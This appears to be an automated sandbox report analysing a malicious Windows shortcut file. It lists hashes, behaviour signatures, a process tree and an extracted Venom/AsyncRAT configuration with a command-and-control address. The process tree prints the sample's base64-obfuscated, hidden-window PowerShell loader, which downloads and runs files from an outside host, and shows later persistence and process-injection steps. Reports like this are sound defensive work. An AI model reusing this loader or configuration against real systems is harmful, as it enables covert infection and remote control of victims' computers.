Analysis
-
max time kernel
93s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
12/07/2024, 06:04
Static task
static1
Behavioral task
behavioral1
Sample
0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1.lnk
Resource
win7-20240705-en
General
-
Target
0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1.lnk
-
Size
2KB
-
MD5
7e7b20e421442d74655685583b4036de
-
SHA1
cf936b1fe122c6a5029c07a64a0f8674b31464af
-
SHA256
0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1
-
SHA512
e58df7f695e08bc57c30a518f35c84b9ab70597696d579291b12c2534a06b24018920cd09f4a0652dcca9791eca207646e4ce38f03bf3650c093a8db9ffe9318
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
64.112.85.3:4449
ufaaryvntrlyhwcwq
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 16 4336 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 4336 powershell.exe 4076 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\myscript.lnk WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4076 set thread context of 804 4076 powershell.exe 92 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-47134698-4092160662-1261813102-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 7 IoCs
pid Process 4336 powershell.exe 4336 powershell.exe 4076 powershell.exe 4076 powershell.exe 804 aspnet_regbrowsers.exe 804 aspnet_regbrowsers.exe 804 aspnet_regbrowsers.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 4336 powershell.exe Token: SeDebugPrivilege 4076 powershell.exe Token: SeDebugPrivilege 804 aspnet_regbrowsers.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 804 aspnet_regbrowsers.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 1156 wrote to memory of 4336 1156 cmd.exe 84 PID 1156 wrote to memory of 4336 1156 cmd.exe 84 PID 4336 wrote to memory of 532 4336 powershell.exe 88 PID 4336 wrote to memory of 532 4336 powershell.exe 88 PID 532 wrote to memory of 2148 532 WScript.exe 89 PID 532 wrote to memory of 2148 532 WScript.exe 89 PID 2148 wrote to memory of 4076 2148 cmd.exe 91 PID 2148 wrote to memory of 4076 2148 cmd.exe 91 PID 4076 wrote to memory of 804 4076 powershell.exe 92 PID 4076 wrote to memory of 804 4076 powershell.exe 92 PID 4076 wrote to memory of 804 4076 powershell.exe 92 PID 4076 wrote to memory of 804 4076 powershell.exe 92 PID 4076 wrote to memory of 804 4076 powershell.exe 92 PID 4076 wrote to memory of 804 4076 powershell.exe 92 PID 4076 wrote to memory of 804 4076 powershell.exe 92 PID 4076 wrote to memory of 804 4076 powershell.exe 92
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\0040de802062e7a83c6f785781873e9c78ec3fe70b8a3c7c3274fdce08b6a6c1.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -NoExit -Command "$avesqBoj49s = 'aXdyIC1VcmkgaHR0cHM6Ly9xdS5heC9PekZMLnBkZiAtT3V0RmlsZSAkZW52OlRFTVBcT25saW5lIEJhbmtpbmcgUGF5bWVudCBBZHZpY2UucGRmLnBkZjtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFxPbmxpbmUgQmFua2luZyBQYXltZW50IEFkdmljZS5wZGYucGRmO1N0YXJ0LVNsZWVwIC1zIDM7U3RhcnQtU2xlZXAgLXMgMztTdGFydC1TbGVlcCAtcyAzO2l3ciAtVXJpIGh0dHBzOi8vcXUuYXgvTnBsLmpzIC1PdXRGaWxlICRlbnY6VEVNUFxWeEl0RVQuanM7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcVnhJdEVULmpzOyRhaD0nWWV4cjc0SFhXNkRpJztFeGl0';$EtRpa8h = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($avesqBoj49s));Invoke-Expression -Command $EtRpa8h"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\VxItET.js"3⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\UPDATE.ps1""4⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\UPDATE.ps1"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:804
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
254KB
MD52ab59c5bd94c0fd78986c451fc0d649f
SHA13e58b73c0c7ec71ffeb6ab1a09a6d6b2f6717f46
SHA2565f0cfa1a3d66bc1e0affb028ba335f5c89f0cb684b59933d0e55f6ed75efc075
SHA512cfd9fd56e3503ba35f6b373df8cd725957641cb45b64f54aa0cd4d5eb3ede53d1dbc9f0965c635f1566686b8331356c239ab5242586473755e5b611517745b74
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
250KB
MD585a84eff8bf73e4661824726438e21ee
SHA1a2b5401bbe15125c0d8d9419d87425366c991fa8
SHA25678e20b9f9e36578c45d1c0e28e68299620ce085953ab3e468ab10f633e586cfc
SHA512e93cb30222036ef2f47dc27cc3d4c6195e6c57d12728e4955707dba69d38b469a0e7242729cebe3d59afe312c3db5bdf20e623ea939ba7f8085d9435b14bcfb0